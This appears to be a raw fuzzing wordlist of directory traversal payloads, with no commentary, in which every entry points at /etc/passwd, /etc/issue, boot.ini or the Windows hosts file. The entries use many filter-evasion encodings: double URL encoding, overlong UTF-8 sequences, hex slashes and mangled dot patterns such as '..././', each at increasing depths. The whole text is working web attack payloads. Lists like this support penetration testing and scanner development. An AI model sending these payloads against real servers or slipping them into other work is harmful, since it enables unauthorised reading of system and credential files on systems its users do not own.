-%2e.%25c0%25af%2e.%25c0%25af%2e.%25c0%25af%2e.%25c0%25af%2e.%25c0%25af%2e.%25c0%25afetc%25c0%25afissue -%2e.%25c0%25af%2e.%25c0%25af%2e.%25c0%25af%2e.%25c0%25af%2e.%25c0%25af%2e.%25c0%25afboot.ini -%2e.%25c0%25af%2e.%25c0%25af%2e.%25c0%25af%2e.%25c0%25af%2e.%25c0%25af%2e.%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -%2e.%f0%80%80%afetc%f0%80%80%afpasswd -%2e.%f0%80%80%afetc%f0%80%80%afissue -%2e.%f0%80%80%afboot.ini -%2e.%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%2e.%f0%80%80%af%2e.%f0%80%80%afetc%f0%80%80%afpasswd -%2e.%f0%80%80%af%2e.%f0%80%80%afetc%f0%80%80%afissue -%2e.%f0%80%80%af%2e.%f0%80%80%afboot.ini -%2e.%f0%80%80%af%2e.%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%2e.%f0%80%80%af%2e.%f0%80%80%af%2e.%f0%80%80%afetc%f0%80%80%afpasswd -%2e.%f0%80%80%af%2e.%f0%80%80%af%2e.%f0%80%80%afetc%f0%80%80%afissue -%2e.%f0%80%80%af%2e.%f0%80%80%af%2e.%f0%80%80%afboot.ini -%2e.%f0%80%80%af%2e.%f0%80%80%af%2e.%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%2e.%f0%80%80%af%2e.%f0%80%80%af%2e.%f0%80%80%af%2e.%f0%80%80%afetc%f0%80%80%afpasswd -%2e.%f0%80%80%af%2e.%f0%80%80%af%2e.%f0%80%80%af%2e.%f0%80%80%afetc%f0%80%80%afissue -%2e.%f0%80%80%af%2e.%f0%80%80%af%2e.%f0%80%80%af%2e.%f0%80%80%afboot.ini -%2e.%f0%80%80%af%2e.%f0%80%80%af%2e.%f0%80%80%af%2e.%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%2e.%f0%80%80%af%2e.%f0%80%80%af%2e.%f0%80%80%af%2e.%f0%80%80%af%2e.%f0%80%80%afetc%f0%80%80%afpasswd -%2e.%f0%80%80%af%2e.%f0%80%80%af%2e.%f0%80%80%af%2e.%f0%80%80%af%2e.%f0%80%80%afetc%f0%80%80%afissue -%2e.%f0%80%80%af%2e.%f0%80%80%af%2e.%f0%80%80%af%2e.%f0%80%80%af%2e.%f0%80%80%afboot.ini -%2e.%f0%80%80%af%2e.%f0%80%80%af%2e.%f0%80%80%af%2e.%f0%80%80%af%2e.%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%2e.%f0%80%80%af%2e.%f0%80%80%af%2e.%f0%80%80%af%2e.%f0%80%80%af%2e.%f0%80%80%af%2e.%f0%80%80%afetc%f0%80%80%afpasswd -%2e.%f0%80%80%af%2e.%f0%80%80%af%2e.%f0%80%80%af%2e.%f0%80%80%af%2e.%f0%80%80%af%2e.%f0%80%80%afetc%f0%80%80%afissue -%2e.%f0%80%80%af%2e.%f0%80%80%af%2e.%f0%80%80%af%2e.%f0%80%80%af%2e.%f0%80%80%af%2e.%f0%80%80%afboot.ini -%2e.%f0%80%80%af%2e.%f0%80%80%af%2e.%f0%80%80%af%2e.%f0%80%80%af%2e.%f0%80%80%af%2e.%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -%2e.%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%2e.%f8%80%80%80%afetc%f8%80%80%80%afissue -%2e.%f8%80%80%80%afboot.ini -%2e.%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%2e.%f8%80%80%80%af%2e.%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%2e.%f8%80%80%80%af%2e.%f8%80%80%80%afetc%f8%80%80%80%afissue -%2e.%f8%80%80%80%af%2e.%f8%80%80%80%afboot.ini -%2e.%f8%80%80%80%af%2e.%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%2e.%f8%80%80%80%af%2e.%f8%80%80%80%af%2e.%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%2e.%f8%80%80%80%af%2e.%f8%80%80%80%af%2e.%f8%80%80%80%afetc%f8%80%80%80%afissue -%2e.%f8%80%80%80%af%2e.%f8%80%80%80%af%2e.%f8%80%80%80%afboot.ini -%2e.%f8%80%80%80%af%2e.%f8%80%80%80%af%2e.%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%2e.%f8%80%80%80%af%2e.%f8%80%80%80%af%2e.%f8%80%80%80%af%2e.%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%2e.%f8%80%80%80%af%2e.%f8%80%80%80%af%2e.%f8%80%80%80%af%2e.%f8%80%80%80%afetc%f8%80%80%80%afissue -%2e.%f8%80%80%80%af%2e.%f8%80%80%80%af%2e.%f8%80%80%80%af%2e.%f8%80%80%80%afboot.ini -%2e.%f8%80%80%80%af%2e.%f8%80%80%80%af%2e.%f8%80%80%80%af%2e.%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%2e.%f8%80%80%80%af%2e.%f8%80%80%80%af%2e.%f8%80%80%80%af%2e.%f8%80%80%80%af%2e.%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%2e.%f8%80%80%80%af%2e.%f8%80%80%80%af%2e.%f8%80%80%80%af%2e.%f8%80%80%80%af%2e.%f8%80%80%80%afetc%f8%80%80%80%afissue -%2e.%f8%80%80%80%af%2e.%f8%80%80%80%af%2e.%f8%80%80%80%af%2e.%f8%80%80%80%af%2e.%f8%80%80%80%afboot.ini -%2e.%f8%80%80%80%af%2e.%f8%80%80%80%af%2e.%f8%80%80%80%af%2e.%f8%80%80%80%af%2e.%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%2e.%f8%80%80%80%af%2e.%f8%80%80%80%af%2e.%f8%80%80%80%af%2e.%f8%80%80%80%af%2e.%f8%80%80%80%af%2e.%f8%80%80%80%afetc%f8%80%80%80%afpasswd -%2e.%f8%80%80%80%af%2e.%f8%80%80%80%af%2e.%f8%80%80%80%af%2e.%f8%80%80%80%af%2e.%f8%80%80%80%af%2e.%f8%80%80%80%afetc%f8%80%80%80%afissue -%2e.%f8%80%80%80%af%2e.%f8%80%80%80%af%2e.%f8%80%80%80%af%2e.%f8%80%80%80%af%2e.%f8%80%80%80%af%2e.%f8%80%80%80%afboot.ini -%2e.%f8%80%80%80%af%2e.%f8%80%80%80%af%2e.%f8%80%80%80%af%2e.%f8%80%80%80%af%2e.%f8%80%80%80%af%2e.%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -..././etc/passwd -..././etc/issue -..././boot.ini -..././windows/system32/drivers/etc/hosts -..././..././etc/passwd -..././..././etc/issue -..././..././boot.ini -..././..././windows/system32/drivers/etc/hosts -..././..././..././etc/passwd -..././..././..././etc/issue -..././..././..././boot.ini -..././..././..././windows/system32/drivers/etc/hosts -..././..././..././..././etc/passwd -..././..././..././..././etc/issue -..././..././..././..././boot.ini -..././..././..././..././windows/system32/drivers/etc/hosts -..././..././..././..././..././etc/passwd -..././..././..././..././..././etc/issue -..././..././..././..././..././boot.ini -..././..././..././..././..././windows/system32/drivers/etc/hosts -..././..././..././..././..././..././etc/passwd -..././..././..././..././..././..././etc/issue -..././..././..././..././..././..././boot.ini -..././..././..././..././..././..././windows/system32/drivers/etc/hosts -.../.\etc\passwd -.../.\etc\issue -.../.\boot.ini -.../.\windows\system32\drivers\etc\hosts -.../.\.../.\etc\passwd -.../.\.../.\etc\issue -.../.\.../.\boot.ini -.../.\.../.\windows\system32\drivers\etc\hosts -.../.\.../.\.../.\etc\passwd -.../.\.../.\.../.\etc\issue -.../.\.../.\.../.\boot.ini -.../.\.../.\.../.\windows\system32\drivers\etc\hosts -.../.\.../.\.../.\.../.\etc\passwd -.../.\.../.\.../.\.../.\etc\issue -.../.\.../.\.../.\.../.\boot.ini -.../.\.../.\.../.\.../.\windows\system32\drivers\etc\hosts -.../.\.../.\.../.\.../.\.../.\etc\passwd -.../.\.../.\.../.\.../.\.../.\etc\issue -.../.\.../.\.../.\.../.\.../.\boot.ini -.../.\.../.\.../.\.../.\.../.\windows\system32\drivers\etc\hosts -.../.\.../.\.../.\.../.\.../.\.../.\etc\passwd -.../.\.../.\.../.\.../.\.../.\.../.\etc\issue -.../.\.../.\.../.\.../.\.../.\.../.\boot.ini -.../.\.../.\.../.\.../.\.../.\.../.\windows\system32\drivers\etc\hosts -.../.%2fetc%2fpasswd -.../.%2fetc%2fissue -.../.%2fboot.ini -.../.%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -.../.%2f.../.%2fetc%2fpasswd -.../.%2f.../.%2fetc%2fissue -.../.%2f.../.%2fboot.ini -.../.%2f.../.%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -.../.%2f.../.%2f.../.%2fetc%2fpasswd -.../.%2f.../.%2f.../.%2fetc%2fissue -.../.%2f.../.%2f.../.%2fboot.ini -.../.%2f.../.%2f.../.%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -.../.%2f.../.%2f.../.%2f.../.%2fetc%2fpasswd -.../.%2f.../.%2f.../.%2f.../.%2fetc%2fissue -.../.%2f.../.%2f.../.%2f.../.%2fboot.ini -.../.%2f.../.%2f.../.%2f.../.%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -.../.%2f.../.%2f.../.%2f.../.%2f.../.%2fetc%2fpasswd -.../.%2f.../.%2f.../.%2f.../.%2f.../.%2fetc%2fissue -.../.%2f.../.%2f.../.%2f.../.%2f.../.%2fboot.ini -.../.%2f.../.%2f.../.%2f.../.%2f.../.%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -.../.%2f.../.%2f.../.%2f.../.%2f.../.%2f.../.%2fetc%2fpasswd -.../.%2f.../.%2f.../.%2f.../.%2f.../.%2f.../.%2fetc%2fissue -.../.%2f.../.%2f.../.%2f.../.%2f.../.%2f.../.%2fboot.ini -.../.%2f.../.%2f.../.%2f.../.%2f.../.%2f.../.%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -.../.%5cetc%5cpasswd -.../.%5cetc%5cissue -.../.%5cboot.ini -.../.%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -.../.%5c.../.%5cetc%5cpasswd -.../.%5c.../.%5cetc%5cissue -.../.%5c.../.%5cboot.ini -.../.%5c.../.%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -.../.%5c.../.%5c.../.%5cetc%5cpasswd -.../.%5c.../.%5c.../.%5cetc%5cissue -.../.%5c.../.%5c.../.%5cboot.ini -.../.%5c.../.%5c.../.%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -.../.%5c.../.%5c.../.%5c.../.%5cetc%5cpasswd -.../.%5c.../.%5c.../.%5c.../.%5cetc%5cissue -.../.%5c.../.%5c.../.%5c.../.%5cboot.ini -.../.%5c.../.%5c.../.%5c.../.%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -.../.%5c.../.%5c.../.%5c.../.%5c.../.%5cetc%5cpasswd -.../.%5c.../.%5c.../.%5c.../.%5c.../.%5cetc%5cissue -.../.%5c.../.%5c.../.%5c.../.%5c.../.%5cboot.ini -.../.%5c.../.%5c.../.%5c.../.%5c.../.%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -.../.%5c.../.%5c.../.%5c.../.%5c.../.%5c.../.%5cetc%5cpasswd -.../.%5c.../.%5c.../.%5c.../.%5c.../.%5c.../.%5cetc%5cissue -.../.%5c.../.%5c.../.%5c.../.%5c.../.%5c.../.%5cboot.ini -.../.%5c.../.%5c.../.%5c.../.%5c.../.%5c.../.%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -.../.0x2fetc0x2fpasswd -.../.0x2fetc0x2fissue -.../.0x2fboot.ini -.../.0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -.../.0x2f.../.0x2fetc0x2fpasswd -.../.0x2f.../.0x2fetc0x2fissue -.../.0x2f.../.0x2fboot.ini -.../.0x2f.../.0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -.../.0x2f.../.0x2f.../.0x2fetc0x2fpasswd -.../.0x2f.../.0x2f.../.0x2fetc0x2fissue -.../.0x2f.../.0x2f.../.0x2fboot.ini -.../.0x2f.../.0x2f.../.0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -.../.0x2f.../.0x2f.../.0x2f.../.0x2fetc0x2fpasswd -.../.0x2f.../.0x2f.../.0x2f.../.0x2fetc0x2fissue -.../.0x2f.../.0x2f.../.0x2f.../.0x2fboot.ini -.../.0x2f.../.0x2f.../.0x2f.../.0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -.../.0x2f.../.0x2f.../.0x2f.../.0x2f.../.0x2fetc0x2fpasswd -.../.0x2f.../.0x2f.../.0x2f.../.0x2f.../.0x2fetc0x2fissue -.../.0x2f.../.0x2f.../.0x2f.../.0x2f.../.0x2fboot.ini -.../.0x2f.../.0x2f.../.0x2f.../.0x2f.../.0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -.../.0x2f.../.0x2f.../.0x2f.../.0x2f.../.0x2f.../.0x2fetc0x2fpasswd -.../.0x2f.../.0x2f.../.0x2f.../.0x2f.../.0x2f.../.0x2fetc0x2fissue -.../.0x2f.../.0x2f.../.0x2f.../.0x2f.../.0x2f.../.0x2fboot.ini -.../.0x2f.../.0x2f.../.0x2f.../.0x2f.../.0x2f.../.0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -.../.0x5cetc0x5cpasswd -.../.0x5cetc0x5cissue -.../.0x5cboot.ini -.../.0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -.../.0x5c.../.0x5cetc0x5cpasswd -.../.0x5c.../.0x5cetc0x5cissue -.../.0x5c.../.0x5cboot.ini -.../.0x5c.../.0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -.../.0x5c.../.0x5c.../.0x5cetc0x5cpasswd -.../.0x5c.../.0x5c.../.0x5cetc0x5cissue -.../.0x5c.../.0x5c.../.0x5cboot.ini -.../.0x5c.../.0x5c.../.0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -.../.0x5c.../.0x5c.../.0x5c.../.0x5cetc0x5cpasswd -.../.0x5c.../.0x5c.../.0x5c.../.0x5cetc0x5cissue -.../.0x5c.../.0x5c.../.0x5c.../.0x5cboot.ini -.../.0x5c.../.0x5c.../.0x5c.../.0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -.../.0x5c.../.0x5c.../.0x5c.../.0x5c.../.0x5cetc0x5cpasswd -.../.0x5c.../.0x5c.../.0x5c.../.0x5c.../.0x5cetc0x5cissue -.../.0x5c.../.0x5c.../.0x5c.../.0x5c.../.0x5cboot.ini -.../.0x5c.../.0x5c.../.0x5c.../.0x5c.../.0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -.../.0x5c.../.0x5c.../.0x5c.../.0x5c.../.0x5c.../.0x5cetc0x5cpasswd -.../.0x5c.../.0x5c.../.0x5c.../.0x5c.../.0x5c.../.0x5cetc0x5cissue -.../.0x5c.../.0x5c.../.0x5c.../.0x5c.../.0x5c.../.0x5cboot.ini -.../.0x5c.../.0x5c.../.0x5c.../.0x5c.../.0x5c.../.0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -.../.%252fetc%252fpasswd -.../.%252fetc%252fissue -.../.%252fboot.ini -.../.%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -.../.%252f.../.%252fetc%252fpasswd -.../.%252f.../.%252fetc%252fissue -.../.%252f.../.%252fboot.ini -.../.%252f.../.%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -.../.%252f.../.%252f.../.%252fetc%252fpasswd -.../.%252f.../.%252f.../.%252fetc%252fissue -.../.%252f.../.%252f.../.%252fboot.ini -.../.%252f.../.%252f.../.%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -.../.%252f.../.%252f.../.%252f.../.%252fetc%252fpasswd -.../.%252f.../.%252f.../.%252f.../.%252fetc%252fissue -.../.%252f.../.%252f.../.%252f.../.%252fboot.ini -.../.%252f.../.%252f.../.%252f.../.%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -.../.%252f.../.%252f.../.%252f.../.%252f.../.%252fetc%252fpasswd -.../.%252f.../.%252f.../.%252f.../.%252f.../.%252fetc%252fissue -.../.%252f.../.%252f.../.%252f.../.%252f.../.%252fboot.ini -.../.%252f.../.%252f.../.%252f.../.%252f.../.%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -.../.%252f.../.%252f.../.%252f.../.%252f.../.%252f.../.%252fetc%252fpasswd -.../.%252f.../.%252f.../.%252f.../.%252f.../.%252f.../.%252fetc%252fissue -.../.%252f.../.%252f.../.%252f.../.%252f.../.%252f.../.%252fboot.ini -.../.%252f.../.%252f.../.%252f.../.%252f.../.%252f.../.%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -.../.%255cetc%255cpasswd -.../.%255cetc%255cissue -.../.%255cboot.ini -.../.%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -.../.%255c.../.%255cetc%255cpasswd -.../.%255c.../.%255cetc%255cissue -.../.%255c.../.%255cboot.ini -.../.%255c.../.%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -.../.%255c.../.%255c.../.%255cetc%255cpasswd -.../.%255c.../.%255c.../.%255cetc%255cissue -.../.%255c.../.%255c.../.%255cboot.ini -.../.%255c.../.%255c.../.%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -.../.%255c.../.%255c.../.%255c.../.%255cetc%255cpasswd -.../.%255c.../.%255c.../.%255c.../.%255cetc%255cissue -.../.%255c.../.%255c.../.%255c.../.%255cboot.ini -.../.%255c.../.%255c.../.%255c.../.%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -.../.%255c.../.%255c.../.%255c.../.%255c.../.%255cetc%255cpasswd -.../.%255c.../.%255c.../.%255c.../.%255c.../.%255cetc%255cissue -.../.%255c.../.%255c.../.%255c.../.%255c.../.%255cboot.ini -.../.%255c.../.%255c.../.%255c.../.%255c.../.%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -.../.%255c.../.%255c.../.%255c.../.%255c.../.%255c.../.%255cetc%255cpasswd -.../.%255c.../.%255c.../.%255c.../.%255c.../.%255c.../.%255cetc%255cissue -.../.%255c.../.%255c.../.%255c.../.%255c.../.%255c.../.%255cboot.ini -.../.%255c.../.%255c.../.%255c.../.%255c.../.%255c.../.%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -.../.%c0%2fetc%c0%2fpasswd -.../.%c0%2fetc%c0%2fissue -.../.%c0%2fboot.ini -.../.%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -.../.%c0%2f.../.%c0%2fetc%c0%2fpasswd -.../.%c0%2f.../.%c0%2fetc%c0%2fissue -.../.%c0%2f.../.%c0%2fboot.ini -.../.%c0%2f.../.%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -.../.%c0%2f.../.%c0%2f.../.%c0%2fetc%c0%2fpasswd -.../.%c0%2f.../.%c0%2f.../.%c0%2fetc%c0%2fissue -.../.%c0%2f.../.%c0%2f.../.%c0%2fboot.ini -.../.%c0%2f.../.%c0%2f.../.%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -.../.%c0%2f.../.%c0%2f.../.%c0%2f.../.%c0%2fetc%c0%2fpasswd -.../.%c0%2f.../.%c0%2f.../.%c0%2f.../.%c0%2fetc%c0%2fissue -.../.%c0%2f.../.%c0%2f.../.%c0%2f.../.%c0%2fboot.ini -.../.%c0%2f.../.%c0%2f.../.%c0%2f.../.%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -.../.%c0%2f.../.%c0%2f.../.%c0%2f.../.%c0%2f.../.%c0%2fetc%c0%2fpasswd -.../.%c0%2f.../.%c0%2f.../.%c0%2f.../.%c0%2f.../.%c0%2fetc%c0%2fissue -.../.%c0%2f.../.%c0%2f.../.%c0%2f.../.%c0%2f.../.%c0%2fboot.ini -.../.%c0%2f.../.%c0%2f.../.%c0%2f.../.%c0%2f.../.%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -.../.%c0%2f.../.%c0%2f.../.%c0%2f.../.%c0%2f.../.%c0%2f.../.%c0%2fetc%c0%2fpasswd -.../.%c0%2f.../.%c0%2f.../.%c0%2f.../.%c0%2f.../.%c0%2f.../.%c0%2fetc%c0%2fissue -.../.%c0%2f.../.%c0%2f.../.%c0%2f.../.%c0%2f.../.%c0%2f.../.%c0%2fboot.ini -.../.%c0%2f.../.%c0%2f.../.%c0%2f.../.%c0%2f.../.%c0%2f.../.%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -.../.%c0%afetc%c0%afpasswd -.../.%c0%afetc%c0%afissue -.../.%c0%afboot.ini -.../.%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -.../.%c0%af.../.%c0%afetc%c0%afpasswd -.../.%c0%af.../.%c0%afetc%c0%afissue -.../.%c0%af.../.%c0%afboot.ini -.../.%c0%af.../.%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -.../.%c0%af.../.%c0%af.../.%c0%afetc%c0%afpasswd -.../.%c0%af.../.%c0%af.../.%c0%afetc%c0%afissue -.../.%c0%af.../.%c0%af.../.%c0%afboot.ini -.../.%c0%af.../.%c0%af.../.%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -.../.%c0%af.../.%c0%af.../.%c0%af.../.%c0%afetc%c0%afpasswd -.../.%c0%af.../.%c0%af.../.%c0%af.../.%c0%afetc%c0%afissue -.../.%c0%af.../.%c0%af.../.%c0%af.../.%c0%afboot.ini -.../.%c0%af.../.%c0%af.../.%c0%af.../.%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -.../.%c0%af.../.%c0%af.../.%c0%af.../.%c0%af.../.%c0%afetc%c0%afpasswd -.../.%c0%af.../.%c0%af.../.%c0%af.../.%c0%af.../.%c0%afetc%c0%afissue -.../.%c0%af.../.%c0%af.../.%c0%af.../.%c0%af.../.%c0%afboot.ini -.../.%c0%af.../.%c0%af.../.%c0%af.../.%c0%af.../.%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -.../.%c0%af.../.%c0%af.../.%c0%af.../.%c0%af.../.%c0%af.../.%c0%afetc%c0%afpasswd -.../.%c0%af.../.%c0%af.../.%c0%af.../.%c0%af.../.%c0%af.../.%c0%afetc%c0%afissue -.../.%c0%af.../.%c0%af.../.%c0%af.../.%c0%af.../.%c0%af.../.%c0%afboot.ini -.../.%c0%af.../.%c0%af.../.%c0%af.../.%c0%af.../.%c0%af.../.%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -.../.%c0%5cetc%c0%5cpasswd -.../.%c0%5cetc%c0%5cissue -.../.%c0%5cboot.ini -.../.%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -.../.%c0%5c.../.%c0%5cetc%c0%5cpasswd -.../.%c0%5c.../.%c0%5cetc%c0%5cissue -.../.%c0%5c.../.%c0%5cboot.ini -.../.%c0%5c.../.%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -.../.%c0%5c.../.%c0%5c.../.%c0%5cetc%c0%5cpasswd -.../.%c0%5c.../.%c0%5c.../.%c0%5cetc%c0%5cissue -.../.%c0%5c.../.%c0%5c.../.%c0%5cboot.ini -.../.%c0%5c.../.%c0%5c.../.%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -.../.%c0%5c.../.%c0%5c.../.%c0%5c.../.%c0%5cetc%c0%5cpasswd -.../.%c0%5c.../.%c0%5c.../.%c0%5c.../.%c0%5cetc%c0%5cissue -.../.%c0%5c.../.%c0%5c.../.%c0%5c.../.%c0%5cboot.ini -.../.%c0%5c.../.%c0%5c.../.%c0%5c.../.%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -.../.%c0%5c.../.%c0%5c.../.%c0%5c.../.%c0%5c.../.%c0%5cetc%c0%5cpasswd -.../.%c0%5c.../.%c0%5c.../.%c0%5c.../.%c0%5c.../.%c0%5cetc%c0%5cissue -.../.%c0%5c.../.%c0%5c.../.%c0%5c.../.%c0%5c.../.%c0%5cboot.ini -.../.%c0%5c.../.%c0%5c.../.%c0%5c.../.%c0%5c.../.%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -.../.%c0%5c.../.%c0%5c.../.%c0%5c.../.%c0%5c.../.%c0%5c.../.%c0%5cetc%c0%5cpasswd -.../.%c0%5c.../.%c0%5c.../.%c0%5c.../.%c0%5c.../.%c0%5c.../.%c0%5cetc%c0%5cissue -.../.%c0%5c.../.%c0%5c.../.%c0%5c.../.%c0%5c.../.%c0%5c.../.%c0%5cboot.ini -.../.%c0%5c.../.%c0%5c.../.%c0%5c.../.%c0%5c.../.%c0%5c.../.%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -.../.%c1%9cetc%c1%9cpasswd -.../.%c1%9cetc%c1%9cissue -.../.%c1%9cboot.ini -.../.%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -.../.%c1%9c.../.%c1%9cetc%c1%9cpasswd -.../.%c1%9c.../.%c1%9cetc%c1%9cissue -.../.%c1%9c.../.%c1%9cboot.ini -.../.%c1%9c.../.%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -.../.%c1%9c.../.%c1%9c.../.%c1%9cetc%c1%9cpasswd -.../.%c1%9c.../.%c1%9c.../.%c1%9cetc%c1%9cissue -.../.%c1%9c.../.%c1%9c.../.%c1%9cboot.ini -.../.%c1%9c.../.%c1%9c.../.%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -.../.%c1%9c.../.%c1%9c.../.%c1%9c.../.%c1%9cetc%c1%9cpasswd -.../.%c1%9c.../.%c1%9c.../.%c1%9c.../.%c1%9cetc%c1%9cissue -.../.%c1%9c.../.%c1%9c.../.%c1%9c.../.%c1%9cboot.ini -.../.%c1%9c.../.%c1%9c.../.%c1%9c.../.%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -.../.%c1%9c.../.%c1%9c.../.%c1%9c.../.%c1%9c.../.%c1%9cetc%c1%9cpasswd -.../.%c1%9c.../.%c1%9c.../.%c1%9c.../.%c1%9c.../.%c1%9cetc%c1%9cissue -.../.%c1%9c.../.%c1%9c.../.%c1%9c.../.%c1%9c.../.%c1%9cboot.ini -.../.%c1%9c.../.%c1%9c.../.%c1%9c.../.%c1%9c.../.%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -.../.%c1%9c.../.%c1%9c.../.%c1%9c.../.%c1%9c.../.%c1%9c.../.%c1%9cetc%c1%9cpasswd -.../.%c1%9c.../.%c1%9c.../.%c1%9c.../.%c1%9c.../.%c1%9c.../.%c1%9cetc%c1%9cissue -.../.%c1%9c.../.%c1%9c.../.%c1%9c.../.%c1%9c.../.%c1%9c.../.%c1%9cboot.ini -.../.%c1%9c.../.%c1%9c.../.%c1%9c.../.%c1%9c.../.%c1%9c.../.%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -.../.%c1%pcetc%c1%pcpasswd -.../.%c1%pcetc%c1%pcissue -.../.%c1%pcboot.ini -.../.%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -.../.%c1%pc.../.%c1%pcetc%c1%pcpasswd -.../.%c1%pc.../.%c1%pcetc%c1%pcissue -.../.%c1%pc.../.%c1%pcboot.ini -.../.%c1%pc.../.%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -.../.%c1%pc.../.%c1%pc.../.%c1%pcetc%c1%pcpasswd -.../.%c1%pc.../.%c1%pc.../.%c1%pcetc%c1%pcissue -.../.%c1%pc.../.%c1%pc.../.%c1%pcboot.ini -.../.%c1%pc.../.%c1%pc.../.%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -.../.%c1%pc.../.%c1%pc.../.%c1%pc.../.%c1%pcetc%c1%pcpasswd -.../.%c1%pc.../.%c1%pc.../.%c1%pc.../.%c1%pcetc%c1%pcissue -.../.%c1%pc.../.%c1%pc.../.%c1%pc.../.%c1%pcboot.ini 